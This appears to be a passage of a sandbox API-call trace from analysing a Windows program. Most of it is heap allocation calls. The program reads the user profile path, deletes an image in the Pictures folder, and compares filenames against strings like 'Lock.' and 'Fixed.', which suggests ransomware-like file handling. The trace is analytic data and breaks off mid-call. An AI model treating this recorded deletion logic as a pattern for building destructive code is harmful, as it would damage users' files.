HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0255.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0255.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0255.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.260] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0255.260] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0255.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0255.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.261] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0255.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0255.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0255.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0255.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0255.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0255.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0255.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0255.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x24202f0 [0255.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/FSvM9zg.png", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FSvM9zg.png", lpFilePart=0x8bedfc*="FSvM9zg.png") returned 0x32 [0255.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0255.262] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FSvM9zg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fsvm9zg.png")) returned 0x20 [0255.262] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FSvM9zg.png", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9bb25a0, ftCreationTime.dwHighDateTime=0x1d4d05b, ftLastAccessTime.dwLowDateTime=0xb8b24da0, ftLastAccessTime.dwHighDateTime=0x1d4d06e, ftLastWriteTime.dwLowDateTime=0xb8b24da0, ftLastWriteTime.dwHighDateTime=0x1d4d06e, nFileSizeHigh=0x0, nFileSizeLow=0x7712, dwReserved0=0x1578, dwReserved1=0x4, cFileName="FSvM9zg.png", cAlternateFileName="")) returned 0xaa5760 [0255.262] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FSvM9zg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fsvm9zg.png")) returned 1 [0255.264] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9bb25a0, ftCreationTime.dwHighDateTime=0x1d4d05b, ftLastAccessTime.dwLowDateTime=0xb8b24da0, ftLastAccessTime.dwHighDateTime=0x1d4d06e, ftLastWriteTime.dwLowDateTime=0xb8b24da0, ftLastWriteTime.dwHighDateTime=0x1d4d06e, nFileSizeHigh=0x0, nFileSizeLow=0x7712, dwReserved0=0x1578, dwReserved1=0x4, cFileName="FSvM9zg.png", cAlternateFileName="")) returned 0 [0255.264] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0255.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0255.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.265] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0255.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0255.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0255.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0255.266] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0255.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0255.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0255.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0255.266] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0255.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0255.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0255.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0255.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0255.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0255.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0255.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0255.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0255.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0255.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0255.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0255.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0255.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0255.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0255.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0255.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0255.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0255.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0255.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x24202f0 [0255.268] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/FSvM9zg.png", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FSvM9zg.png", lpFilePart=0x8bf658*="FSvM9zg.png") returned 0x32 [0255.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0255.268] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FSvM9zg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fsvm9zg.png")) returned 0xffffffff [0255.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0255.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0255.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0255.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.269] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0255.269] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.269] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0255.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0255.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0255.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0255.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0255.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0255.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0255.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FWAReLHUsSkJL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WAReLHUsSkJL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AReLHUsSkJL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ReLHUsSkJL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eLHUsSkJL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LHUsSkJL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HUsSkJL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UsSkJL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sSkJL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SkJL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kJL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JL.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.270] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0255.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.270] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0255.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0255.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FWAReLHUsSkJL.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WAReLHUsSkJL.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AReLHUsSkJL.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ReLHUsSkJL.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eLHUsSkJL.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LHUsSkJL.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HUsSkJL.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UsSkJL.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.271] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sSkJL.bmp", cchCount1=6, 